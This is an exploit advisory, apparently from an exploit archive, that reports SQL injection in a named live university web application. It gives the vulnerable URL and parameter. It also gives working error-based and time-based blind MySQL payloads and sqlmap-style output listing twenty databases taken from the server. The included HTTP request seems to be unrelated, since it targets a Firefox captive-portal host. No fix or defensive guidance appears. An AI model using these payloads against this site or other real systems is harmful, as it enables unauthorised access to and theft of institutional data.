Afyon Kocatepe University SQL injection

2020.01.09
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: SQL Injection in “https://bys.aku.edu.tr/”
#-----------------------------------------------------------------------------------------
# Exploit Author: Prototyqe/Furkan Özer
#-----------------------------------------------------------------------------------------
# Date: 09.01.2019
#-----------------------------------------------------------------------------------------
# Category: Web Application
#-----------------------------------------------------------------------------------------
# Vulnerability Path: https://bys.aku.edu.tr/index.php?birim=[sql%27li]
#-----------------------------------------------------------------------------------------
#GET /success.txt HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
Connection: close

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: birim=30 AND (SELECT 7465 FROM(SELECT COUNT(*),CONCAT(0x71717a7671,(SELECT (ELT(7465=7465,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: birim=30 AND (SELECT 1518 FROM (SELECT(SLEEP(5)))WkCi)

web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29, PHP
back-end DBMS: MySQL >= 5.0
[15:27:55] [INFO] fetching database names
[15:28:12] [INFO] used SQL query returns 20 entries
[15:28:15] [INFO] retrieved: 'information_schema'
[15:28:18] [INFO] retrieved: 'akuftp'
[15:28:22] [INFO] retrieved: 'akuper'
[15:28:25] [INFO] retrieved: 'bys'
[15:28:28] [INFO] retrieved: 'donerser'
[15:28:31] [INFO] retrieved: 'etikkurul'
[15:28:35] [INFO] retrieved: 'faaliyet'
[15:28:38] [INFO] retrieved: 'kirasis'
[15:28:42] [INFO] retrieved: 'labcihaz'
[15:28:45] [INFO] retrieved: 'merkez_switchler'
[15:28:48] [INFO] retrieved: 'muh_lab'
[15:28:52] [INFO] retrieved: 'mysql'
[15:28:56] [INFO] retrieved: 'optik_afsu'
[15:29:00] [INFO] retrieved: 'optik_sinav'
[15:29:04] [INFO] retrieved: 'performance_schema'
[15:29:07] [INFO] retrieved: 'phpmyadmin'
[15:29:10] [INFO] retrieved: 'sys'
[15:29:13] [INFO] retrieved: 'uni_net'
[15:29:16] [INFO] retrieved: 'yenikirasis'
[15:29:19] [INFO] retrieved: 'zimbralog'
available databases [20]:
[*] akuftp
[*] akuper
[*] bys
[*] donerser
[*] etikkurul
[*] faaliyet
[*] information_schema
[*] kirasis
[*] labcihaz
[*] merkez_switchler
[*] muh_lab
[*] mysql
[*] optik_afsu
[*] optik_sinav
[*] performance_schema
[*] phpmyadmin
[*] sys
[*] uni_net
[*] yenikirasis
[*] zimbralog



Copyright 2020, cxsecurity.com

 
